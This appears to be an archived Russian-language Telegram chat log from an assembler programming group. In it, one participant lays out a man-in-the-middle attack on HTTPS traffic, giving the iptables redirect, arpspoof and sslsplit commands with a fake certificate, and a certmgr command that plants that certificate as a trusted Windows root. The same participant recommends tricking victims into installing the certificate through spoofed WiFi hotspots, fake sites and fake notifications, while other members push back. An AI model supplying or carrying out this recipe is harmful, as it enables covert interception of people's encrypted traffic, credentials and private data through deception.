Size: a a a

Ассемблер

2021 October 02

a

asm in Ассемблер
Добро пожаловать Hagzer Colaro. Не ответив на вопрос, будешь удалён из чата
источник

d

disba1ancer in Ассемблер
так сертификат ещё как-то подменить надо в хранилище юзера... точнее добавить свой
источник

楽園松本 in Ассемблер
Hagzer, пылесос или хлеборезка?
источник

E

Entusiast in Ассемблер
перенаправление трафика + sslsplit

iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

(arpspoof)

sslsplit -D -l connections.log -L data.log -c fake_cert.crt -k fake_key.key ssl 0.0.0.0 8443

Перед этим подписать сертификат, чтобы у юзера открывались сайты: (для Windows) certmgr.exe -add -c fake_cert.crt -s -r localMachine root

И насчёт импортирования, кстати, сейчас каждый юзер когда заходит на сайт - автоматически кликает "скачать сертификат". Не сложно подменить сайт, и заставить его скачать твой сертификат. В конце концов, можно подменить WiFi, и там перенаправлять на свой сайт с просьбой скачать сертификат
источник

a

asm in Ассемблер
Добро пожаловать Stv Y. Не ответив на вопрос, будешь удалён из чата
источник

SY

Stv Y in Ассемблер
nasm?
источник

d

disba1ancer in Ассемблер
где ты видел нечто просящее скачать сертификат? ни разу не встречал...
источник

d

disba1ancer in Ассемблер
просьбы скачать сертификат, это уже тревожный звоночек, надо сразу закрывать страницу
источник

E

Entusiast in Ассемблер
Ну на смартфонах, как минимум, постоянно вижу. Как захожу на сайт - просят добавить сертификат.
И друзья у меня постоянно тыкают "добавить"
источник

d

disba1ancer in Ассемблер
ты где живёшь? в какой стране, смысле
источник

E

Entusiast in Ассемблер
А это тут причём?
Да и вообще, тут дело в социальной инженерии. Заставить сертификат скачать несложно
Хотя мне и для анализа HTTPS траффика хватает sslstrip
источник

🐖

🐖Глебка💨 in Ассемблер
В Казахстане видел только такое. А так на телефоне только уведомления видел
источник

E

Entusiast in Ассемблер
Да, уведомления
Иногда ещё на рекламных сайтах делают фейк-уведомление. Срабатывает в большинстве
источник

d

disba1ancer in Ассемблер
затем, что я ни разу не натыкался на подобное, никогда ничего не просило
источник

d

disba1ancer in Ассемблер
и они именно об установке сертификата?
источник

🐖

🐖Глебка💨 in Ассемблер
Ну так это другое, там не говорят же качать. Хотя если бы было про сертификаты, все бы жали, да
источник

E

Entusiast in Ассемблер
Просто на сайты мало заходишь))
источник

d

disba1ancer in Ассемблер
а нечего по сомнительным местам лазать
источник

楽園松本 in Ассемблер
На чём прогаешь?
источник

E

Entusiast in Ассемблер
А кто сказал "лазить"
Просто такая техника существует. Тебя никто спрашивать не будет, когда весь твой траффик будут перенаправлять на точку доступа  с сайтом злоумышленника, и просить таки установить сертификат, а никуда ты больше и не зайдёшь
источник